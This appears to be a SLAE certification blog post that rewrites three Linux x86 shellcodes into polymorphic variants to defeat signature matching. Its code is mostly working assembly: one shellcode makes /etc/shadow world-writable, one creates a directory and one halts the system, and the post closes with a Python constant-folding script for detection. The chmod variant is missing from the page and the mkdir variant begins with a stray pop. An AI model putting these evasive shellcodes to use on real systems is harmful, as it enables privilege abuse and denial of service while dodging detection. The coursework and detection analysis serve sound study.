- Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching
- The polymorphic versions cannot be larger than 150% of the existing shellcode
- Bonus points for making it shorter in length than the original
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1017
We need to modify 3 shellcodes from shell-storm.org or exploit-db.com so that the shellcodes don't look like the originals while maintaining the same functionality.
chmod 666 /etc/shadow
We used arithmetic instructions (SUB/ADD) to replace literal values in the original code such as /etc/shadow and 0666. We also clear EAX at the beginning of the shellcode, since we found that when EAX is non-zero it throws an error.
Link: http://shell-storm.org/shellcode/files/shellcode-566.php
Original:

```nasm
; linux/x86 chmod 666 /etc/shadow 27 bytes
; [email protected]
; 2010-01-15
section .text
global _start
_start:
    ; chmod("//etc/shadow", 0666);
    mov al, 15               ; chmod; relies on the upper bytes of eax already being zero
    cdq
    push edx                 ; null terminator
    push dword 0x776f6461    ; "adow"
    push dword 0x68732f63    ; "c/sh"
    push dword 0x74652f2f    ; "//et"
    mov ebx, esp             ; ebx -> "//etc/shadow"
    mov cx, 0666o
    int 0x80
```

Polymorphic Version (only the header comment of this listing is preserved on the page):

```nasm
; linux/x86 chmod 666 /etc/shadow 37 bytes
```
mkdir()
Link: http://shell-storm.org/shellcode/files/shellcode-542.php
Instead of using the JMP-CALL-POP method, we directly push the string onto the stack. We also removed the exit syscall to save space.
The shellcode size decreased from 36 bytes to 24 bytes.
Original:

```nasm
section .text
global _start
_start:
    jmp short call_shellcode
shellcode:
    pop esi                  ; esi -> directory name
    xor eax,eax
    mov [esi+0x6],al         ; overwrite the trailing '#' with a null terminator
    mov al,0x27              ; mkdir
    lea ebx,[esi]
    mov cx,0x1ed             ; mode 0755
    int 0x80
    mov al,0x1               ; exit
    xor ebx,ebx
    int 0x80
call_shellcode:
    call dword shellcode
    db "hacked#"             ; bytes 68 61 63 6b 65 64 23; the page shows them
                             ; disassembled as "push dword 0x656b6361 / fs / db 0x23"
```

Polymorphic Version:

```nasm
section .text
global _start
_start:
    pop esi
    xor eax,eax
    push eax                 ; null terminator
    push dword 0x2f2f7265    ; "er//"
    push dword 0x6b636168    ; "hack"  -> "hacker//"
    mov al,0x27              ; mkdir
    mov ebx,esp
    mov cx,0x1ed             ; mode 0755
    int 0x80
```
shutdown()
We used arithmetic instructions (SUB/ADD) to replace literal values in the original code such as /bin/shutdown.
The size increased from 30 bytes to 41 bytes.
Link: https://www.exploit-db.com/exploits/37289/
Original:

```nasm
section .text
global _start
_start:
    xor eax,eax
    push eax                 ; null terminator
    push dword 0x746c6168    ; "halt"
    push dword 0x2f2f6e69    ; "in//"
    push dword 0x62732f2f    ; "//sb"  -> "//sbin//halt"
    mov ebx,esp
    push eax
    mov edx,esp              ; envp = NULL
    push ebx
    mov ecx,esp              ; argv = {"//sbin//halt", NULL}
    mov al,0xb               ; execve
    int 0x80
```

Polymorphic Version:

```nasm
section .text
global _start
_start:
    xor eax,eax
    push eax                 ; null terminator
    mov ecx, 0x11111111
    add ecx, 0x635b5057      ; = 0x746c6168 "halt" (page listed 0x636b5057, which folds to "ha|t")
    push ecx
    sub ecx, 0x453cf2ff      ; = 0x2f2f6e69 "in//"
    push ecx
    add ecx, 0x3343c0c6      ; = 0x62732f2f "//sb"
    push ecx
    mov ebx,esp              ; ebx -> "//sbin//halt"
    push eax
    mov edx,esp              ; envp = NULL
    push ebx
    mov ecx,esp              ; argv = {"//sbin//halt", NULL}
    mov al, 0xb              ; execve
    int 0x80
```
The system shut down after we executed the command.
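The SUB/ADD trick used in the chmod and shutdown variants only hides the string from a signature that looks for the literal dword immediates; an analyst folding the constants gets the path back. The following Python is an added analysis example (not code from the writeup): it parses the two /sbin/halt listings, shows that the "halt", "in//" and "//sb" immediates a byte signature would key on are absent from the polymorphic variant, and then recovers "//sbin//halt" from both by constant folding. The embedded listings are copied from the page (the polymorphic one with the corrected add constant 0x635b5057); the regex-based mini-parser and its function names are my own.

```python
"""Fold mov/add/sub/push immediates in a NASM listing to recover the string
a shellcode builds on the stack.  Added analysis example, not code from the
writeup; the listings below are copied from it (SHUTDOWN_POLYMORPHIC with
the corrected add constant 0x635b5057 so the chain folds to "halt")."""
import re
import struct

MASK32 = 0xFFFFFFFF
# Forms handled: xor r,r / mov r,imm / add r,imm / sub r,imm / mov r,esp /
# push imm / push r.  Labels, int 0x80, lea and the rest are ignored.
INSN = re.compile(r"^(?P<op>xor|mov|add|sub|push)\s+(?:dword\s+)?"
                  r"(?P<a>\w+)(?:\s*,\s*(?P<b>\w+))?$")

SHUTDOWN_ORIGINAL = """xor eax,eax
push eax
push dword 0x746c6168
push dword 0x2f2f6e69
push dword 0x62732f2f
mov ebx,esp
push eax
mov edx,esp
push ebx
mov ecx,esp
mov al,0xb
int 0x80"""

SHUTDOWN_POLYMORPHIC = """xor eax,eax
push eax
mov ecx, 0x11111111
add ecx, 0x635b5057
push ecx
sub ecx, 0x453cf2ff
push ecx
add ecx, 0x3343c0c6
push ecx
mov ebx,esp
push eax
mov edx,esp
push ebx
mov ecx,esp
mov al, 0xb
int 0x80"""


def _imm(tok):
    """NASM immediate (0x.. or decimal) as a 32-bit value; None for registers
    and for forms such as 0666o that are not needed here."""
    try:
        return int(tok, 0) & MASK32
    except ValueError:
        return None


def _parse(listing):
    """Yield (op, operand1, operand2) for the instruction forms we handle."""
    for raw in listing.splitlines():
        m = INSN.match(raw.split(";", 1)[0].strip().lower())
        if m:
            yield m.group("op"), m.group("a"), m.group("b")


def push_immediate_chunks(listing):
    """The dwords pushed as literal immediates, as the bytes a signature on the
    assembled shellcode would see.  Values built with ADD/SUB never appear."""
    return [struct.pack("<I", _imm(a)) for op, a, _ in _parse(listing)
            if op == "push" and _imm(a) is not None]


def recover_stack_strings(listing):
    """Every string the listing assembles with pushes and then references via
    `mov reg, esp`; folding add/sub chains recovers the hidden pieces."""
    regs, pushed, found = {}, [], []
    for op, a, b in _parse(listing):
        if op == "push":
            val = _imm(a) if _imm(a) is not None else regs.get(a)
            if val is not None:             # skip pushes of unknown registers
                pushed.append(val)
        elif op == "xor" and a == b:
            regs[a] = 0
        elif op == "mov" and b == "esp":
            # Address of the stack top taken: the string is complete.  The last
            # push sits at the lowest address, so it holds the first bytes.
            data = b"".join(struct.pack("<I", v) for v in reversed(pushed))
            found.append(data.split(b"\0", 1)[0])
            pushed = []
        elif op in ("mov", "add", "sub") and b is not None and _imm(b) is not None:
            imm, cur = _imm(b), regs.get(a, 0)
            regs[a] = {"mov": imm, "add": cur + imm, "sub": cur - imm}[op] & MASK32
    return [s for s in found if s]


if __name__ == "__main__":
    for name, code in (("original", SHUTDOWN_ORIGINAL),
                       ("polymorphic", SHUTDOWN_POLYMORPHIC)):
        print(name, push_immediate_chunks(code), recover_stack_strings(code))
```

Running it prints the three literal chunks for the original and an empty list for the polymorphic variant, while both recover b"//sbin//halt". That is the practical takeaway for detection: a signature on the pushed immediates is brittle against this transformation, whereas constant folding (or simply watching for execve of a halt/shutdown binary at runtime) is not.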